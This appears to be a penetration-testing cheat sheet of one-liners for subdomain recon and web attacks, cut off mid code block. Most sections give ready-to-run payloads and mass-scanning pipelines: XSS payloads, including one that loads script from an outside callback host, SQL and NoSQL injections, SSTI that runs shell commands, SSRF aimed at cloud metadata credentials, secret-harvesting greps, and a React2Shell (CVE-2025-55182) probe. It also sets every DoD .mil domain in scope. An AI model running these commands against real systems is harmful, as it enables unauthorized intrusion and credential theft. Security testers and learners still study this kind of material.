From Beginner to Expert (and Into Jail): 400+ Curated Hands-On Penetration-Testing Paths

Contents

| Section | Description |
| --- | --- |
| About | Project overview and goals |
| Quick Start | Up and running in 5 minutes |
| Required Tools | Essential toolset |
| BBRF Scope | Scope configuration |
| Subdomain Enumeration | Finding subdomains |
| JavaScript Recon | JS file analysis |
| XSS Detection | Cross-site scripting |
| SQL Injection | SQLi techniques |
| SSRF & SSTI | Server-side attacks |
| Web Crawling | Deep crawling methods |
| Parameter Discovery | Hidden parameters |
| Content Discovery | Sensitive files |
| Nuclei Scanning | Automated scanning |
| API Security Testing | API vulnerabilities |
| Cloud Security | AWS, GCP, Azure |
| Automation Scripts | Ready-made scripts |
| Bash Aliases | Shell productivity |
| New 2024-2025 One-Liners | Latest techniques |
| Search Engines | Hacker search engines |
| Wordlists | Best wordlists |
| Resources | Books, courses, blogs |

🎯 About

The main goal is to share penetration-testing tips. Using recon methods, we have found exploitable subdomains, APIs and tokens.


🚀 Quick Start

Complete your first recon in under 5 minutes:

```bash
# 1. Install essential tools
go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

# 2. Run your first recon
subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high

# 3. Profit! 🎉
```

🛠️ Required Tools

Core tools

| Category | Tools | Installation |
| --- | --- | --- |
| Subdomain | Subfinder, Amass, Assetfinder, Findomain, Chaos | go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest |
| HTTP | Httpx, Httprobe | go install github.com/projectdiscovery/httpx/cmd/httpx@latest |
| Crawling | Katana, Gospider, Hakrawler, Cariddi | go install github.com/projectdiscovery/katana/cmd/katana@latest |
| URLs | Gau, Waybackurls, Waymore | go install github.com/lc/gau/v2/cmd/gau@latest |
| Scanning | Nuclei, Jaeles, Naabu | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest |
| XSS | Dalfox, XSStrike, Kxss, Airixss | go install github.com/hahwul/dalfox/v2@latest |
| SQLi | SQLMap, Ghauri | pip install sqlmap ghauri |
| Utilities | Anew, Qsreplace, Unfurl, Gf, Uro | go install github.com/tomnomnom/anew@latest |
| Fuzzing | Ffuf, Feroxbuster | go install github.com/ffuf/ffuf/v2@latest |
| JS Analysis | Subjs, LinkFinder, SecretFinder, Jsubfinder | go install github.com/lc/subjs@latest |

Quick install script

```bash
#!/bin/bash
# One-click install for all Go tools
tools=(
    "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest"
    "github.com/projectdiscovery/httpx/cmd/httpx@latest"
    "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest"
    "github.com/projectdiscovery/katana/cmd/katana@latest"
    "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest"
    "github.com/lc/gau/v2/cmd/gau@latest"
    "github.com/tomnomnom/waybackurls@latest"
    "github.com/tomnomnom/anew@latest"
    "github.com/tomnomnom/qsreplace@latest"
    "github.com/tomnomnom/unfurl@latest"
    "github.com/tomnomnom/gf@latest"
    "github.com/hahwul/dalfox/v2@latest"
    "github.com/ffuf/ffuf/v2@latest"
    "github.com/jaeles-project/gospider@latest"
    "github.com/hakluke/hakrawler@latest"
)

for tool in "${tools[@]}"; do
    echo "[+] Installing $tool"
    go install -v "$tool"
done
echo "[✓] All tools installed!"
```

🎯 BBRF Scope

```bash
# Add all DoD domains to BBRF scope
bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'
```

💀 Subdomain Enumeration ☠️

💀 Multi-source discovery (all-in-one)

```bash
# ☠️ Ultimate subdomain enumeration - All tools combined
subfinder -d target.com -all -silent | anew subs.txt
amass enum -passive -d target.com | anew subs.txt
assetfinder -subs-only target.com | anew subs.txt
chaos -d target.com -silent | anew subs.txt
findomain -t target.com -q | anew subs.txt
cat subs.txt | httpx -silent -threads 200 | anew alive.txt
```

💀 Certificate Transparency logs

```bash
# ☠️ crt.sh extraction
curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent
```

💀 Shodan + Nuclei pipeline

```bash
# ☠️ Shodan recon -> Nuclei scan
shodan domain target.com | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
```

💀 ASN discovery & reverse DNS

```bash
# ☠️ Find all IPs from organization ASN
echo 'target_org' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'
```

💀 DNS brute force with Shuffledns

```bash
shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew
```

💀 Recursive subdomain enum

```bash
subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt
```

💀 Passive DNS - multiple sources

```bash
# ☠️ HackerTarget
curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt

# ☠️ RapidDNS
curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt

# ☠️ Riddler.io
curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt

# ☠️ AlienVault OTX
curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt

# ☠️ URLScan.io
curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt
```

💀 GitHub subdomain scraping

```bash
github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt
```

💀 Censys subdomain discovery

```bash
# ☠️ Using Censys API
censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt
```

💀 SecurityTrails API

```bash
# ☠️ SecurityTrails subdomain enumeration
curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt
```

💀 Wayback Machine subdomains

```bash
# ☠️ Extract subdomains from Wayback Machine
curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt
```

💀 Common Crawl extraction

```bash
# ☠️ CommonCrawl subdomain extraction
curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt
```

💀 VirusTotal subdomains

```bash
# ☠️ VirusTotal API
curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt
```

💀 DNS zone transfer attempt

```bash
# ☠️ Check for zone transfer vulnerability
dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print $1}' | sed 's/\.$//' | anew zone_transfer.txt
```

💀 Reverse IP lookup

```bash
# ☠️ Find domains on same IP
host target.com | awk '/has address/ {print $4}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt
```

💀 BGP/ASN range scanner

```bash
# ☠️ Get ASN and scan all IP ranges
whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt
```

💀 PTR records from IP ranges

```bash
# ☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt
```

💀 The ultimate all-in-one one-liner

```bash
# ☠️ THE ULTIMATE SUBDOMAIN HUNTER ☠️
(subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt
```

💀 Subdomain permutation / brute force

```bash
# ☠️ Generate permutations and resolve
cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt
```

💀 DNS wordlist brute force with PureDNS

```bash
# ☠️ Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt
```

💀 TLS/SSL certificate scraper

```bash
# ☠️ Extract subdomains from SSL certificates
echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt
```

💀 Favicon hash -> Shodan

```bash
# ☠️ Find related hosts via favicon hash
# Shodan's http.favicon.hash is mmh3 over the base64-encoded icon, so an MD5 digest would never match
curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))" | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt
```

💀 Google dork subdomain discovery

```bash
# ☠️ Use Google dorks (manual or with tools)
# site:*.target.com -www
# inurl:target.com
```

📜 JavaScript Recon

Complete JS pipeline

```bash
subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txt
```

Extract secrets from JS

```bash
# -l takes the list file; nuclei's -target expects URLs, not a file path
cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -l js.txt
```

LinkFinder on JS files

```bash
cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt
```

SecretFinder mass scan

```bash
cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt
```

JS variable extraction

```bash
cat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -u
```

API keys from JS

```bash
cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt
```

Extract all URLs from JS

```bash
# [:space:] instead of \s: inside a bracket expression GNU grep treats the backslash literally and would exclude every "s"
cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[^\"'\`<>[:space:]]+" | sort -u | anew js_urls.txt
```

Find API endpoints in JS

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"'\`<>[:space:]]+|/v[0-9]+/[^\"'\`<>[:space:]]+)" | sort -u
```

Extract hardcoded credentials

```bash
cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u
```

💀 Extract AWS keys from JS files

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt
```

💀 Find S3 buckets in JavaScript

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt
```

💀 Extract Google API keys

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z_-]{35}" | sort -u | anew google_api_keys.txt
```

💀 Find Firebase URLs in JS

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebaseapp\.com" | sort -u | anew firebase_urls.txt
```

💀 Extract GraphQL endpoints from JS

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt
```

💀 Find internal IPs and hostnames in JS

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}[^\"' ]*|https?://[a-zA-Z0-9-]+\.(internal|local|corp|lan|intra)[^\"' ]*" | sort -u | anew internal_hosts.txt
```

💀 Extract JWT tokens from JS files

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt
```

💀 Find Webpack source maps

```bash
cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt
```

💀 Extract Slack/Discord webhooks from JS

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/[A-Za-z0-9/]+|https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew webhooks.txt
```

💀 Find hidden admin routes in JavaScript

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt
```

💉 XSS Detection

Dalfox pipeline

```bash
cat urls.txt | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | dalfox pipe --silence --skip-bav
```

Blind XSS with callback

```bash
cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent
```

Airixss quick scan

```bash
echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
```

Knoxss API

```bash
cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"
```

DOM XSS detection

```bash
cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'
```

Mass XSS with Nuclei DAST

```bash
cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50
```

Reflected parameter detection

```bash
cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt
```

XSS polyglot test

```bash
# Single-quoted so the shell does not treat the backticks as command substitution
cat urls.txt | gf xss | qsreplace 'jaVasCript:/*-/*`/*\`/*'\''/*"/**/(/* */oNcLiCk=alert() )//' | httpx -silent -mr "alert"
```

🗄️ SQL Injection

SQLMap mass scan

```bash
cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2
```

Error-based detection

```bash
cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt
```

Time-based blind

```bash
cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt
```

Ghauri scan

```bash
cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3
```

UNION probing

```bash
cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200
```

Boolean-based detection

```bash
cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt
```

NoSQL injection

```bash
cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt
cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt
```

🌐 SSRF & SSTI

SSRF with an out-of-band callback (Interactsh / Collaborator)

```bash
cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent
```

SSRF parameter fuzzing

```bash
cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"
```

SSTI detection

```bash
cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt
```

SSTI payload test

```bash
cat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"
```

Full SSRF chain

```bash
cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent
```

SSRF with DNS rebinding

```bash
cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent
```

Jinja2 SSTI

```bash
cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent
```

🕷️ Web Crawling

Katana deep dive

```bash
katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt
```

Gospider full crawl

```bash
gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew
```

Hakrawler with scope

```bash
echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt
```

ParamSpider discovery

```bash
paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt
```

Waymore historical URLs

```bash
waymore -i target.com -mode U -oU urls.txt
```

Headless browser crawling

```bash
katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt
```

Extract forms

```bash
katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt
```

🔑 Parameter Discovery

X8 hidden parameters

```bash
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt
```

Arjun discovery

```bash
arjun -i urls.txt -oT arjun_params.txt --stable
```

Custom parameter brute force

```bash
# ffuf does not read target URLs from stdin, so loop over the list and fuzz the parameter name on each URL
while read -r url; do ffuf -w params.txt:FUZZ -u "${url}?FUZZ=test" -mc 200,301,302 -ac; done < urls.txt
```

Mine parameters from JS

```bash
cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u
```

Parameter pollution test

```bash
cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200
```

📁 Content Discovery

Ffuf directory brute force

```bash
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100
```

Git exposure

```bash
cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt
```

Sensitive files

```bash
cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt
```

Backup files

```bash
cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200
```

API documentation

```bash
cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt
```

Source code leakage

```bash
cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt
```

Config files

```bash
cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt
```

Database files

```bash
cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt
```

⚡ Nuclei Scanning

Full template scan

```bash
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt
```

CVE scan

```bash
nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt
```

Subdomain takeover

```bash
subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50
```

Exposed panels

```bash
nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt
```

Misconfigurations

```bash
nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt
```

DAST mode

```bash
nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt
```

Custom tags

```bash
nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt
```

Network scan

```bash
nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt
```

🔌 API Security Testing

GraphQL introspection

```bash
cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"
```

REST API enumeration

```bash
cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt
```

JWT analysis

```bash
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txt
```

API key leakage

```bash
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt
```

Broken authentication

```bash
# Test endpoints without auth
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt
```

Rate limit testing

```bash
for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c
```

BOLA/IDOR testing

```bash
cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt
```

☁️ Cloud Security

AWS S3 bucket finder

```bash
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt
```

S3 permission check

```bash
# Reduce both "name.s3.amazonaws.com" and "s3://name" to the bare bucket name before listing it unauthenticated
cat s3_buckets.txt | sed -E 's#^s3://##; s/\.s3\.amazonaws\.com$//' | sort -u | xargs -I@ sh -c 'aws s3 ls "s3://@" --no-sign-request >/dev/null 2>&1 && echo "OPEN: @"'
```

Firebase databases

```bash
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s "https://@/.json" | grep -v "null"
```

Azure Blob Storage

```bash
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt
```

GCP Storage

```bash
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt
```

AWS metadata SSRF

```bash
cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"
```

Cloud credential files

```bash
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt
```

🤖 Automation Scripts

Full recon pipeline

```bash
#!/bin/bash
# Usage: ./recon.sh target.com
domain="$1"
[ -z "$domain" ] && { echo "usage: $0 <domain>"; exit 1; }
mkdir -p "$domain" && cd "$domain" || exit 1

# Subdomains
subfinder -d "$domain" -all -silent | anew subs.txt
amass enum -passive -d "$domain" | anew subs.txt
assetfinder -subs-only "$domain" | anew subs.txt

# Alive check
cat subs.txt | httpx -silent -threads 100 | anew alive.txt

# URLs
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt
cat alive.txt | waybackurls | anew urls.txt
cat alive.txt | gau --threads 50 | anew urls.txt

# Vulnerability patterns
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
cat urls.txt | gf ssrf | anew ssrf.txt
cat urls.txt | gf lfi | anew lfi.txt

# Nuclei scan
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
```

XSS hunter script

```bash
#!/bin/bash
# Usage: ./xsshunter.sh target.com
target="$1"
echo "$target" | waybackurls | anew urls.txt
echo "$target" | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '"><img src=x onerror=alert(1)>' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt
```

API recon script

```bash
#!/bin/bash
# Usage: ./apirecon.sh target.com (expects alive.txt and js.txt in the target directory)
target="$1"
mkdir -p "$target/api" && cd "$target/api" || exit 1

# Find API endpoints
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt

# Extract from JS ([:space:] rather than \s, which GNU grep treats literally inside brackets)
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"'\`<>[:space:]]+)" | sort -u | anew js_api_endpoints.txt

# Test GraphQL
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt

echo "[+] API recon complete!"
```

⚙️ Bash Aliases

Add these to your `.bashrc` or `.zshrc`:

```bash
# Quick recon
recon() {
    subfinder -d "$1" -silent | anew subs.txt
    assetfinder -subs-only "$1" | anew subs.txt
    cat subs.txt | httpx -silent | anew alive.txt
    echo "[+] Found $(wc -l < alive.txt) alive hosts"
}

# XSS scan
xscan() {
    echo "$1" | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}

# SQLi scan
sqscan() {
    echo "$1" | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}

# JS recon
jsrecon() {
    echo "$1" | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}

# Nuclei quick
nuke() {
    echo "$1" | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}

# Full pipeline
fullrecon() {
    recon "$1"
    cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
    cat urls.txt | gf xss | anew xss.txt
    cat urls.txt | gf sqli | anew sqli.txt
    nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}

# Certificate search
cert() {
    curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}

# Parameter extraction
params() {
    echo "$1" | waybackurls | grep "=" | uro | unfurl keys | sort -u
}

# Subdomain takeover check
takeover() {
    subfinder -d "$1" -silent | httpx -silent | nuclei -t takeovers/ -c 50
}

# Port scan
portscan() {
    naabu -host "$1" -top-ports 1000 -silent | httpx -silent | anew "${1}_ports.txt"
}

# Screenshot all (argument is a file of URLs)
screenshot() {
    cat "$1" | xargs -I@ gowitness single @ -o screenshots/
}
```

🆕 New 2024-2025 One-Liners

⚡🔥⚡ React2Shell - CVE-2025-55182 (CVSS 10.0 - Critical) ⚡🔥⚡

💀 Critical RCE in React Server Components and Next.js - under active exploitation! Added to the CISA KEV catalogue 💀

⚡ Detect Next.js apps (recon first)

```bash
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt
```

⚡ Check whether the Next-Action header is accepted

```bash
curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'
```

⚡ Mass detection - Next-Action header accepted

```bash
cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt
```

⚡ Create the payload file for testing

```bash
# Create payload.json (safe math check - no RCE)
echo '{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"$1:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt
```

⚡ Manual vulnerability check with cURL

```bash
curl -X POST https://target.com -H "Next-Action: check" -F "0=@payload.json" -F "1=@trigger.txt" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"
```

⚡ One-liner: full detection pipeline

```bash
subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt
```

⚡ Detect the vulnerable response header

```bash
cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'
```

⚡ Mass scan with httpx + Next-Action probe

```bash
cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt
```

⚡ Shodan search for Next.js targets

```bash
shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew shodan_nextjs.txt
```

⚡ Nuclei template check

```bash
